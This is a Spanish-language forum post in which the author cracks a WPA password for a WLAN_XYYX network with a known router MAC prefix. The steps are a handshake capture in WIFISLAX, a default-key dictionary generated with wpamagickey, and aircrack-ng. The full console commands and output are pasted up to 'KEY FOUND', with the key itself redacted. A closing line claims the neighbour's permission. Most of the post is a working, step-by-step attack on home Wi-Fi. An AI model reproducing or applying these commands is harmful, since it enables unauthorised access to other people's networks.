Esta tarde me dió por probar unas cuantas cosillas...
la primera un capturador de handshake que viene en la distro WIFISLAX 4.3 Final(no recuerdo el nombre,pero sólo tiene uno)....una vez obtenido el paquete,reinicio y continúo con xubuntu...
la segunda...me descargo e instalo wpamagickey,una vez hecho,genero un diccionario para una WLAN_XYYX con mac 00:1A:2B...al cual le llamo dicc a secas.(X es Nº e Y LETRA)
Y ya por último,abro consola y le paso el diccionario al handshake con aircrack-ng y BINGO...me da la wpa....y encima la CORRECTA...
Me explico...después de probar todos y cada uno de los programas que generaban una posible clave por defecto,NI UNO SOLO me dió la wpa correcta...y así durante meses...hasta hoy.
Reconozco que he tenido una suerte INCREÍBLE al estar la pass en el diccionario....no me ha dado tiempo ni a pestañear...apenas 1 sg XD
Os pongo un copy-paste del proceso por consola:
wpakill@MMXIII:~$ sudo wpamagickey WLAN_XYYX 00:1A:2B:XX:XX:XX dicc
Essid: WLAN_XYYX - Bssid: 00:1A:2B:XX:XX:XX
- Generando fichero de claves: dicc
Calculadas 512 claves (10.8 kB)
- Fichero guardado OK
wpakill@MMXIII:~$ sudo aircrack-ng -w /home/wpakill/Escritorio/dicc /home/wpakill/Escritorio/hs-00-1A-2B-XX-XX-XX.cap
[sudo] password for wpakill:
Opening /home/wpakill/Escritorio/hs-00-1A-2B-XX-XX-XX.cap
Read 13050 packets.
# BSSID ESSID Encryption
1 00:1A:2B:XX:XX:XX WLAN_XYYX WPA (1 handshake)
Choosing first network as target.
Opening /home/wpakill/Escritorio/hs-00-1A-2B-XX-XX-XX.cap
Reading packets, please wait...
Aircrack-ng 1.1 r2230
[00:00:01] 232 keys tested (149.21 k/s)
KEY FOUND! [ 20 letras y números ]
Master Key : 37 EB 8E 74 4F AB CD C0 E8 2D E9 DB 37 3D C3 80
edito toda la línea
Transient Key : 95 17 4A E6 F8 D4 F6 28 0E BB 2D 5A C3 8E 44 07
y 3 líneas mas
EAPOL HMAC : edito la línea
wpakill@MMXIII:~$
pd.NI QUÉ DECIR TIENE QUE ESTO PUEDO HACERLO CON EL PERMISO DE MI VECINO-COLEGA...obviamente la pass se la he cambiado yo mismo...una de las que pyrit tardaría 2 ó 3 años......luz